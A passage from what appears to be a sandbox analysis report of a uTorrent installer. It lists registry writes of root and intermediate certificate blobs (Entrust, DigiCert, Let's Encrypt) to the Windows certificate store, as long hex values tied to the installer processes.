e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431\Blob = 5c00000001000000040000000008000019000000010000001000000091fad483f14848a8a69b18b805cdbb3a0f0000000100000014000000327fc447408de9bf596f83d4b2fa4b8e3e7097d8090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b060105050703076200000001000000200000006dc47172e01cbcb0bf62580d895fe2b8ac9ad4f873801e0c10b9c837d21eb1770b000000010000001e00000045006e00740072007500730074002000280032003000340038002900000014000000010000001400000055e481d11180bed889b908a331f9a1240916b9701d0000000100000010000000e871723e266f38af5d49cda2a502669c7e000000010000000800000000c001b39667d601030000000100000014000000503006091d97d4f5ae39f7cbe7927d7d652d3431040000000100000010000000ee2931bc327e9ae6e8b5f751b434719020000000010000002e0400003082042a30820312a00302010202043863def8300d06092a864886f70d01010505003081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f7269747920283230343829301e170d3939313232343137353035315a170d3239303732343134313531325a3081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f726974792028323034382930820122300d06092a864886f70d01010105000382010f003082010a0282010100ad4d4ba91286b2eaa320071516642a2b4bd1bf0b4a4d8eed8076a567b77840c07342c868c0db532bdd5eb8769835938b1a9d7c133a0e1f5bb71ecfe524141eb181a98d7db8cc6b4b03f1020cdcaba54024007f7494a19d0829b3880bf587779d55cde4c37ed76a64ab851486955b9732506f3dc8ba660ce3fcbdb849c176894919fdc0a8bd89a3672fc69fbc711960b82de92cc99076667b94e2af78d665535d3cd69cb2cf2903f92fa450b2d448ce0532558afdb2644c0ee4980775db7fdfb9085560853029f97b48a46986e3353f1e865d7a7a15bdef008e1522541700902693bc0e496891bff847d39d9542c10e4ddf6f26cfc3182162664370d6d5c007e10203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041455e481d11180bed889b908a331f9a1240916b970300d06092a864886f70d010105050003820101003b9b8f569b30e753997c7a79a74d97d7199590fb061fca337c46638f966624fa401b2127cae67273f24ffe3199fdc80c4c6853c680821398fab6adda5d3df1ce6ef6151194820cee3f95af11ab0fd72fde1f038f572c1ec9bb9a1a4495eb184fa61fcd7d57102f9b04095a84b56ed81d3ae1d69ed16c795e791c14c5e3d04c933b653ceddf3dbea6e5951ac3b519c3bd5e5bbbff23ef6819cb1293275c032d6f30d01eb61aacde5af7d1aaa827a6fe7981c479993357ba12b0a9e0426c93ca56defe6d840b088b7e8dead79821c6f3e73c792f5e9cd14c158de1ec2237cc9a430b97dc80908db3679b6f48081556cfbff12b7c5e9a76e95990c57c8335116551 | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\SystemCertificates\CA\Certificates\C94DC4831A901A9FEC0FB49B71BD49B5AAD4FAD0 | C:\Users\Admin\AppData\Local\Temp\is-5SD8N.tmp\utorrent9.tmp | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\SystemCertificates\CA\Certificates\C94DC4831A901A9FEC0FB49B71BD49B5AAD4FAD0\Blob = 030000000100000014000000c94dc4831a901a9fec0fb49b71bd49b5aad4fad01400000001000000140000009327469803a951688e98d6c44248db23bf5894d204000000010000001000000026864c28a4de37f569c1ec87a0eccb270f0000000100000020000000b35e05950cfbd8259f9375ba101870b8c3c4c0ec5a529757e63167e9de26a9e81900000001000000100000009f6337f867e721aac07c3ba0fbdb64315c0000000100000004000000800100001800000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000005b040000308204573082023fa003020102021100b0573e9173972770dbb487cb3a452b38300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3234303331333030303030305a170d3237303331323233353935395a3032310b300906035504061302555331163014060355040a130d4c6574277320456e6372797074310b30090603550403130245363076301006072a8648ce3d020106052b8104002203620004d9f19e4687f8217160a826eba3fab9eada1db912a7d426d95114b1617c7596bf220b391fd5bed10a46aa2d3c4a09842ebe409555e91940376675ed324e770449f8707bc318e7cef77110feac74d800d4ed6d1c731633109c3ab2ea6c62f4bdb8a381f83081f5300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030206082b0601050507030130120603551d130101ff040830060101ff020100301d0603551d0e041604149327469803a951688e98d6c44248db23bf5894d2301f0603551d2304183016801479b459e67bb6e5e40173800888c81a58f6e99b6e303206082b0601050507010104263024302206082b060105050730028616687474703a2f2f78312e692e6c656e63722e6f72672f30130603551d20040c300a3008060667810c01020130270603551d1f0420301e301ca01aa0188616687474703a2f2f78312e632e6c656e63722e6f72672f300d06092a864886f70d01010b050003820201007d8b7b4a2035b20586088a6e9e4e3aaf8004c4845c33190a81484d96baefd41db584e69737fe66884f8b3936eb72653f33dcaf0ba31563bdf418d1682fc22127c8fcbeb38ba4c636d8e3fa6da4b593d60caed0d3970247a066f2d384e14d47810e4b12f518ae1ef89c66a05e75074817ae6966e86978370605c2e261ab10aff10ee60c71b4bc939a0b0748e55205c14e9fd960bfb2c408fabd8bb99f1f79a9c60ad1292c47a4ea19d0a5cc701fa11eebe59251e7b6f708d2630c4349a1623eaab4c152b64175469086dc83dd230a55090aaef0657bb3cb9b927473b3edc2fc19b5f5114ea223e90e4c2fc8d7ef990d785e4caaa8a2b9a19f33843df69054509316bcb994ae878693226171927bb7f70681c484571388cac6502641ce108c5668ab52a642a420d09ff5245f11945bc96acd557232ef625bd4076b7a9e93baa108c1de5f8f35fd03a501fb894c775b3e408d00a2e8bdb9163c84d3aaba059fd0966b58765ffc6586a8e1246a3c4b3fe9c02217e41fe73836524696b43a619752ca32e4cd2e8b6fb17f7d1cfebd5767da3727a0a1d4342f24c0a6bfef4f4d583c4e3abcdb032e02bee1c2fa4ebcc2fdae1672617949127ddfccebbff76e2472d740892ee6fd3e1303b2e7d1dd9b43d3fc4afff387435740928dd47fd97b99337929cac48a2e00f570a88303e21182e3830b17cef5cc98220e3abfd985981bf21f4e | C:\Users\Admin\AppData\Local\Temp\is-5SD8N.tmp\utorrent9.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431\Blob = 19000000010000001000000091fad483f14848a8a69b18b805cdbb3a0f0000000100000014000000327fc447408de9bf596f83d4b2fa4b8e3e7097d8090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b060105050703076200000001000000200000006dc47172e01cbcb0bf62580d895fe2b8ac9ad4f873801e0c10b9c837d21eb1770b000000010000001e00000045006e00740072007500730074002000280032003000340038002900000014000000010000001400000055e481d11180bed889b908a331f9a1240916b9701d0000000100000010000000e871723e266f38af5d49cda2a502669c7e000000010000000800000000c001b39667d601030000000100000014000000503006091d97d4f5ae39f7cbe7927d7d652d343120000000010000002e0400003082042a30820312a00302010202043863def8300d06092a864886f70d01010505003081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f7269747920283230343829301e170d3939313232343137353035315a170d3239303732343134313531325a3081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f726974792028323034382930820122300d06092a864886f70d01010105000382010f003082010a0282010100ad4d4ba91286b2eaa320071516642a2b4bd1bf0b4a4d8eed8076a567b77840c07342c868c0db532bdd5eb8769835938b1a9d7c133a0e1f5bb71ecfe524141eb181a98d7db8cc6b4b03f1020cdcaba54024007f7494a19d0829b3880bf587779d55cde4c37ed76a64ab851486955b9732506f3dc8ba660ce3fcbdb849c176894919fdc0a8bd89a3672fc69fbc711960b82de92cc99076667b94e2af78d665535d3cd69cb2cf2903f92fa450b2d448ce0532558afdb2644c0ee4980775db7fdfb9085560853029f97b48a46986e3353f1e865d7a7a15bdef008e1522541700902693bc0e496891bff847d39d9542c10e4ddf6f26cfc3182162664370d6d5c007e10203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041455e481d11180bed889b908a331f9a1240916b970300d06092a864886f70d010105050003820101003b9b8f569b30e753997c7a79a74d97d7199590fb061fca337c46638f966624fa401b2127cae67273f24ffe3199fdc80c4c6853c680821398fab6adda5d3df1ce6ef6151194820cee3f95af11ab0fd72fde1f038f572c1ec9bb9a1a4495eb184fa61fcd7d57102f9b04095a84b56ed81d3ae1d69ed16c795e791c14c5e3d04c933b653ceddf3dbea6e5951ac3b519c3bd5e5bbbff23ef6819cb1293275c032d6f30d01eb61aacde5af7d1aaa827a6fe7981c479993357ba12b0a9e0426c93ca56defe6d840b088b7e8dead79821c6f3e73c792f5e9cd14c158de1ec2237cc9a430b97dc80908db3679b6f48081556cfbff12b7c5e9a76e95990c57c8335116551 | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431 | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431\Blob = 040000000100000010000000ee2931bc327e9ae6e8b5f751b4347190030000000100000014000000503006091d97d4f5ae39f7cbe7927d7d652d34317e000000010000000800000000c001b39667d6011d0000000100000010000000e871723e266f38af5d49cda2a502669c14000000010000001400000055e481d11180bed889b908a331f9a1240916b9700b000000010000001e00000045006e0074007200750073007400200028003200300034003800290000006200000001000000200000006dc47172e01cbcb0bf62580d895fe2b8ac9ad4f873801e0c10b9c837d21eb1777f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b06010505070307530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f0000000100000014000000327fc447408de9bf596f83d4b2fa4b8e3e7097d819000000010000001000000091fad483f14848a8a69b18b805cdbb3a20000000010000002e0400003082042a30820312a00302010202043863def8300d06092a864886f70d01010505003081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f7269747920283230343829301e170d3939313232343137353035315a170d3239303732343134313531325a3081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f726974792028323034382930820122300d06092a864886f70d01010105000382010f003082010a0282010100ad4d4ba91286b2eaa320071516642a2b4bd1bf0b4a4d8eed8076a567b77840c07342c868c0db532bdd5eb8769835938b1a9d7c133a0e1f5bb71ecfe524141eb181a98d7db8cc6b4b03f1020cdcaba54024007f7494a19d0829b3880bf587779d55cde4c37ed76a64ab851486955b9732506f3dc8ba660ce3fcbdb849c176894919fdc0a8bd89a3672fc69fbc711960b82de92cc99076667b94e2af78d665535d3cd69cb2cf2903f92fa450b2d448ce0532558afdb2644c0ee4980775db7fdfb9085560853029f97b48a46986e3353f1e865d7a7a15bdef008e1522541700902693bc0e496891bff847d39d9542c10e4ddf6f26cfc3182162664370d6d5c007e10203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041455e481d11180bed889b908a331f9a1240916b970300d06092a864886f70d010105050003820101003b9b8f569b30e753997c7a79a74d97d7199590fb061fca337c46638f966624fa401b2127cae67273f24ffe3199fdc80c4c6853c680821398fab6adda5d3df1ce6ef6151194820cee3f95af11ab0fd72fde1f038f572c1ec9bb9a1a4495eb184fa61fcd7d57102f9b04095a84b56ed81d3ae1d69ed16c795e791c14c5e3d04c933b653ceddf3dbea6e5951ac3b519c3bd5e5bbbff23ef6819cb1293275c032d6f30d01eb61aacde5af7d1aaa827a6fe7981c479993357ba12b0a9e0426c93ca56defe6d840b088b7e8dead79821c6f3e73c792f5e9cd14c158de1ec2237cc9a430b97dc80908db3679b6f48081556cfbff12b7c5e9a76e95990c57c8335116551 | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b